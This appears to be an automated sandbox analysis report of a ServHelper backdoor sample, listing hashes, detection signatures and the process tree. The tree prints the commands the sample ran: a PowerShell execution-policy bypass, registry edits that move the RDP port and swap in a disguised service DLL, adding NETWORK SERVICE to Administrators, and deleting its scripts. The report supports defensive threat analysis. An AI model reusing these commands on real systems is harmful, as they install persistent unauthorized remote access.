Analysis
-
max time kernel
130s -
max time network
142s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
11-10-2021 13:54
Static task
static1
Behavioral task
behavioral1
Sample
Unconfirmed 357794.crdownload.exe
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
Unconfirmed 357794.crdownload.exe
Resource
win10v20210408
General
-
Target
Unconfirmed 357794.crdownload.exe
-
Size
4.3MB
-
MD5
3170bcf7de646f8612910ab98f6d1861
-
SHA1
71d81b3dd1747cf1c0e744fcb1809d6522eab902
-
SHA256
bea9da3ee504f62fc074963332e96297c7fff5efb2999efc946bc518a3765c00
-
SHA512
f232d67902f1b7fc3eb73efc7df575dcac83f5943e613e61982c78c9d4c47b18eadd6d87f2b4d040ec4125f4770a33f03b5743b3b18c34ab622b258f913b91c5
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc Process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Drops file in Windows directory 8 IoCs
Processes:
powershell.exedescription ioc Process File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid Process 704 powershell.exe 704 powershell.exe 704 powershell.exe 4076 powershell.exe 4076 powershell.exe 4076 powershell.exe 1792 powershell.exe 1792 powershell.exe 1792 powershell.exe 592 powershell.exe 592 powershell.exe 592 powershell.exe 704 powershell.exe 704 powershell.exe 704 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid Process 616 -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 704 powershell.exe Token: SeDebugPrivilege 4076 powershell.exe Token: SeDebugPrivilege 1792 powershell.exe Token: SeDebugPrivilege 592 powershell.exe -
Suspicious use of WriteProcessMemory 63 IoCs
Processes:
Unconfirmed 357794.crdownload.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.exedescription pid Process procid_target PID 3492 wrote to memory of 704 3492 Unconfirmed 357794.crdownload.exe 72 PID 3492 wrote to memory of 704 3492 Unconfirmed 357794.crdownload.exe 72 PID 3492 wrote to memory of 704 3492 Unconfirmed 357794.crdownload.exe 72 PID 704 wrote to memory of 1380 704 powershell.exe 74 PID 704 wrote to memory of 1380 704 powershell.exe 74 PID 704 wrote to memory of 1380 704 powershell.exe 74 PID 1380 wrote to memory of 1732 1380 csc.exe 75 PID 1380 wrote to memory of 1732 1380 csc.exe 75 PID 1380 wrote to memory of 1732 1380 csc.exe 75 PID 704 wrote to memory of 4076 704 powershell.exe 76 PID 704 wrote to memory of 4076 704 powershell.exe 76 PID 704 wrote to memory of 4076 704 powershell.exe 76 PID 704 wrote to memory of 1792 704 powershell.exe 80 PID 704 wrote to memory of 1792 704 powershell.exe 80 PID 704 wrote to memory of 1792 704 powershell.exe 80 PID 704 wrote to memory of 592 704 powershell.exe 83 PID 704 wrote to memory of 592 704 powershell.exe 83 PID 704 wrote to memory of 592 704 powershell.exe 83 PID 704 wrote to memory of 2016 704 powershell.exe 85 PID 704 wrote to memory of 2016 704 powershell.exe 85 PID 704 wrote to memory of 2016 704 powershell.exe 85 PID 704 wrote to memory of 2232 704 powershell.exe 86 PID 704 wrote to memory of 2232 704 powershell.exe 86 PID 704 wrote to memory of 2232 704 powershell.exe 86 PID 704 wrote to memory of 2096 704 powershell.exe 87 PID 704 wrote to memory of 2096 704 powershell.exe 87 PID 704 wrote to memory of 2096 704 powershell.exe 87 PID 704 wrote to memory of 3528 704 powershell.exe 88 PID 704 wrote to memory of 3528 704 powershell.exe 88 PID 704 wrote to memory of 3528 704 powershell.exe 88 PID 3528 wrote to memory of 2392 3528 net.exe 89 PID 3528 wrote to memory of 2392 3528 net.exe 89 PID 3528 wrote to memory of 2392 3528 net.exe 89 PID 704 wrote to memory of 3312 704 powershell.exe 90 PID 704 wrote to memory of 3312 704 powershell.exe 90 PID 704 wrote to memory of 3312 704 powershell.exe 90 PID 3312 wrote to memory of 2780 3312 cmd.exe 91 PID 3312 wrote to memory of 2780 3312 cmd.exe 91 PID 3312 wrote to memory of 2780 3312 cmd.exe 91 PID 2780 wrote to memory of 3148 2780 cmd.exe 92 PID 2780 wrote to memory of 3148 2780 cmd.exe 92 PID 2780 wrote to memory of 3148 2780 cmd.exe 92 PID 3148 wrote to memory of 1164 3148 net.exe 93 PID 3148 wrote to memory of 1164 3148 net.exe 93 PID 3148 wrote to memory of 1164 3148 net.exe 93 PID 704 wrote to memory of 1868 704 powershell.exe 94 PID 704 wrote to memory of 1868 704 powershell.exe 94 PID 704 wrote to memory of 1868 704 powershell.exe 94 PID 1868 wrote to memory of 3068 1868 cmd.exe 95 PID 1868 wrote to memory of 3068 1868 cmd.exe 95 PID 1868 wrote to memory of 3068 1868 cmd.exe 95 PID 3068 wrote to memory of 1680 3068 cmd.exe 96 PID 3068 wrote to memory of 1680 3068 cmd.exe 96 PID 3068 wrote to memory of 1680 3068 cmd.exe 96 PID 1680 wrote to memory of 1496 1680 net.exe 97 PID 1680 wrote to memory of 1496 1680 net.exe 97 PID 1680 wrote to memory of 1496 1680 net.exe 97 PID 704 wrote to memory of 3808 704 powershell.exe 99 PID 704 wrote to memory of 3808 704 powershell.exe 99 PID 704 wrote to memory of 3808 704 powershell.exe 99 PID 704 wrote to memory of 3256 704 powershell.exe 100 PID 704 wrote to memory of 3256 704 powershell.exe 100 PID 704 wrote to memory of 3256 704 powershell.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\Unconfirmed 357794.crdownload.exe"C:\Users\Admin\AppData\Local\Temp\Unconfirmed 357794.crdownload.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3492 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:704 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\coj5ad2o\coj5ad2o.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:1380 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9CD2.tmp" "c:\Users\Admin\AppData\Local\Temp\coj5ad2o\CSCC36E9A03A15D4667A77A45F61B7D4F7.TMP"4⤵PID:1732
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4076
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:2016
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:2232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2096
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:3528 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:2392
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:3312 -
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:3148 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1164
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:3068 -
C:\Windows\SysWOW64\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1496
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:3808
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:3256
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
f3068198b62b4b70404ec46694d632be
SHA17b0b31ae227cf2a78cb751573a9d07f755104ea0
SHA256bd0fab28319be50795bd6aa9692742ba12539b136036acce2e0403f10a779fc8
SHA512ef285a93898a9436219540f247beb52da69242d05069b3f50d1761bb956ebb8468aeaeadcb87dd7a09f5039c479a31f313c83c4a63c2b2f789f1fe55b4fa9795
-
MD5
a0b67713527c6235255939c46a1f9a45
SHA18697f4df0096d217c310edbf3a383820a396d8a3
SHA256c0645613ccd6b67ea1a197a2966d49be2be75685bcd342009999e1134bdb0be0
SHA51298866b343de32b074fd182e22dbb9a35d881750affa88ea45e5d1e42abeb38d0f667271f09c2a80a53b11aab6e001750a9c706dabf8e4dc82f73a91131230fa0
-
MD5
240ecbb4731b5bd3bab5234d98dd16fd
SHA1b334b03e7bc48aea9a18e22f7c2bb3edd40bd02c
SHA256d24bf975eb62ced949512d3f1be43c0bb9c71a883edf31c5abc829881a997736
SHA5129d26e918511436e04f7160f01aa8144a0e6841cb8bb748b5abb010bf3c6bfdbb0de30807656bcff0c86dbd2497d4d2ebbfecf47b37f09b38c1a212e54862c335
-
MD5
794bf0ae26a7efb0c516cf4a7692c501
SHA1c8f81d0ddd4d360dcbe0814a04a86748f99c6ff2
SHA25697753653d52aaa961e4d1364b5b43551c76da9bb19e12f741bd67c986259e825
SHA51220c97972a1256375157f82a859ce4936613fe109d54c63bbec25734edc3a567ca976b342a21ef5f25571b3c1959afe618ad9f9f17a817cfd731d1504541b1a75
-
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
MD5
69e2d76afe649de50fa887720d7a2996
SHA1b2897897279d7ac5a635076d2e8e8452b17623c2
SHA2565737be278bef788decdeaacaa990bfadc5321f35fa6a223a61b97ee87a4c25b6
SHA512ed47a3e26db6bf058b70d627c996fee43ecc919c42294164aa8029b10e27246e39fe80975c6372c1e1276349f801844fb7bb9a6a208ade31c3fb43d354a0b994
-
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
MD5
de639bfe8c9f9e7c0a6caf92786595fd
SHA1a17e4a3a3bb67c1eef27fbfd4fef50875628d22d
SHA2560486b5e5e77e72c81d1a5023f7b1d4f342b66e3abebfdca7220383f11811b7ba
SHA5125e0f1a355d96998c0336084dda00e55e78f9b32a0cd02b2d3cdd7ad02ab285199c8c29279c027f8f5774fc2e30cd968aa9835ee072d11af7097a130eb7e4f9a7